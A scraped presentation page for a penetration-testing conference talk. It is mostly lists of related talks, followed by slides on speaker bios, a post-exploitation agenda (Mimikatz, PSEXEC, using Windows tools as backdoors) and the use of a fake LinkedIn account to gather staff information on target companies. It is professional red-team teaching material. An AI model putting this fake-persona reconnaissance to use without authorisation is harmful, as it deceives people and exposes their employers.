hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
 
The Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick Maludy
The Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick MaludyThe Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick Maludy
The Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick Maludy
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 

Viewers also liked

MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary ModulesChris Gates
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010Chris Gates
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackersChris Gates
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Cecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsCecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsBenjamin Delpy
 

Viewers also liked (15)

MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary Modules
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Cecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsCecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de Windows
 
mimikatz @ sthack
mimikatz @ sthackmimikatz @ sthack
mimikatz @ sthack
 

Similar to Dirty Little Secrets They Didn't Teach You In Pentest Class v2

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdNipun Jaswal
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconKarl Fosaaen
 
Securing Your MongoDB Deployment
Securing Your MongoDB DeploymentSecuring Your MongoDB Deployment
Securing Your MongoDB DeploymentMongoDB
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server SecurityBrian Pontarelli
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesFelipe Prado
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedOctavio Paguaga
 
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by DesignJon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Designjonmccoy
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
How to write secure code
How to write secure codeHow to write secure code
How to write secure codeFlaskdata.io
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesHashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesNick Maludy
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...in.security Ltd.
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
 
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...MongoDB
 

Similar to Dirty Little Secrets They Didn't Teach You In Pentest Class v2 (20)

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
 
Securing Your MongoDB Deployment
Securing Your MongoDB DeploymentSecuring Your MongoDB Deployment
Securing Your MongoDB Deployment
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
 
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by DesignJon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
How to write secure code
How to write secure codeHow to write secure code
How to write secure code
 
authentication.ppt
authentication.pptauthentication.ppt
authentication.ppt
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesHashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
 

More from Chris Gates

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVChris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018Chris Gates
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) Chris Gates
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionChris Gates
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsChris Gates
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfChris Gates
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitChris Gates
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 

More from Chris Gates (12)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon Edition
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security Environments
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With Metasploit
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 

Recently uploaded

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 

Recently uploaded (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 

Dirty Little Secrets They Didn't Teach You In Pentest Class v2

  • 1.
  • 2. Whoami • Rob Fuller (mubix) – Twitter -> mubix – Blog -> http://www.room362.com – NoVA Hackers • Previous Talks – Dirty Little Secrets – Networking for Penetration Testers – Metasploit Framework/Pro Training for Rapid7 – Deep Magic 101 – Couch to Career in 80 hours
  • 3. Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – NoVAHackers • Previous Talks – ColdFusion for Pentesters – From LOW to PWNED – Dirty Little Secrets – Attacking Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
  • 4. Infoz • No philosophical stuff this time – Just digging in and showing neat shit we’ve been doing since last year – Last year’s stuff still applies although was told we were “preaching to the choir”…who still doesn’t do it…maybe on Sundays… – Anway…
  • 5. Agenda • Putting in the hours on LinkedIn for SE • Giving IR teams a run for their money • Stealing certs • Mimikatz with Metasploit • New Incognito && Netview release • Ditto • 10 ways to PSEXEC • Why doesn’t SYSTEM have proxy settings!?! • Windows is my backdoor (bitsadmin, powershell, wmi ) • WebDAV server via metasploit • Turning your External Pentest into an Internal one • Overview of current DNS Payload options (if time)
  • 6. The setup… We like to use LinkedIn for OSINT but how can we do it better?
  • 7. Becoming a LiON • Why? • API is based on YOUR connections • 2nd and 3rd level connections count but are give different access • Creating a fake account • Connecting with Recruiters ++ • Connecting with “Open Networkers”
  • 8. LinkedIn API • URL: https://developer.linkedin.com • Allows you to query information – Company info – Groups – Name about your 1st & 2nd order connections
  • 9. Big Ass LinkedIn Network • Meet “John” • John has been busy being awesome on LinkedIn for the last few months
  • 11. LinkedIn API • Limited by YOUR connections and network reach • API gives you NO info about 3rd order connections • Usually you’ll see more info via the web on 3rd order people • The total number of search results possible for any search will vary depending on the user's account level.
  • 12. LinkedIn API • An example (Palantir) CG vs. John
  • 13. LinkedIn API • An example (Pfizer) CG vs. John
  • 14. LinkedIn API • An example (Bank of America) CG vs. John
  • 15. More LinkedIn • Turning an email list into validated LinkedIn Contacts/emails • Import them!
  • 16. More LinkedIn • Get some emails
